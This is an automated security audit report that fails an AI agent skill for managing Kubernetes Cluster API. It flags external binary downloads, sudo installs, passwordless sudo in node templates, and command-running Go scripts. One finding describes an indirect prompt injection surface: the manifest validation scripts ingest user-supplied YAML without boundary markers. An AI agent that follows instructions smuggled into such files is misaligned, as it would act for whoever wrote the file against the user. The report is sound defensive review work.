Skills
skills/itechmeat/llm-code/k8s-cluster-api/Gen Agent Trust Hub

k8s-cluster-api

Fail

Audited by Gen Agent Trust Hub on Apr 21, 2026

Risk Level: HIGHEXTERNAL_DOWNLOADSCOMMAND_EXECUTION
Full Analysis
  • [EXTERNAL_DOWNLOADS]: The skill provides instructions in SKILL.md and references/clusterctl.md to download the clusterctl binary from the official Kubernetes-SIGs GitHub repository (github.com/kubernetes-sigs/cluster-api). This source is a well-known and trusted repository within the Kubernetes ecosystem.
  • [COMMAND_EXECUTION]: Instructions in the quick start and reference guides direct the user to use sudo for installing the downloaded CLI tool into system-wide executable paths (e.g., /usr/local/bin/). Additionally, node bootstrap templates in references/bootstrap.md include configuration for passwordless sudo access for administrative users on provisioned cluster nodes.
  • [COMMAND_EXECUTION]: The skill ships with several Go-based utility scripts in the scripts/ directory. These scripts (e.g., audit-security, check-cluster-health, export-cluster-state) utilize the os/exec package to run kubectl and clusterctl commands. These scripts also perform file system operations, such as creating diagnostic directories and writing exported cluster state to local YAML files.
  • [COMMAND_EXECUTION]: The skill exhibits an indirect prompt injection surface through its manifest validation and linting scripts (scripts/validate-manifests/main.go, scripts/lint-cluster-templates/main.go).
  • Ingestion points: These scripts parse data from external YAML manifests provided by the user for validation.
  • Boundary markers: Explicit boundary markers or instructions to ignore embedded commands are absent in the Go parsing logic.
  • Capability inventory: The skill includes scripts that can execute system commands (kubectl, clusterctl) and write to the local filesystem.
  • Sanitization: While the scripts do not interpret manifest content as shell commands directly, the parsed data is used to populate parameters for diagnostic and management tools.
  • [SAFE]: Secret management instructions correctly advise the use of environment variables or Kubernetes Secrets. Templates such as assets/aws-credentials.yaml and assets/azure-credentials.yaml use clear placeholders for credentials rather than hardcoding sensitive data.
Recommendations
  • HIGH: Downloads and executes remote code from: https://github.com/kubernetes-sigs/cluster-api/releases/download/v1.12.0/clusterctl-linux-amd64 - DO NOT USE without thorough review
Audit Metadata
Risk Level
HIGH
Analyzed
Apr 21, 2026, 12:21 AM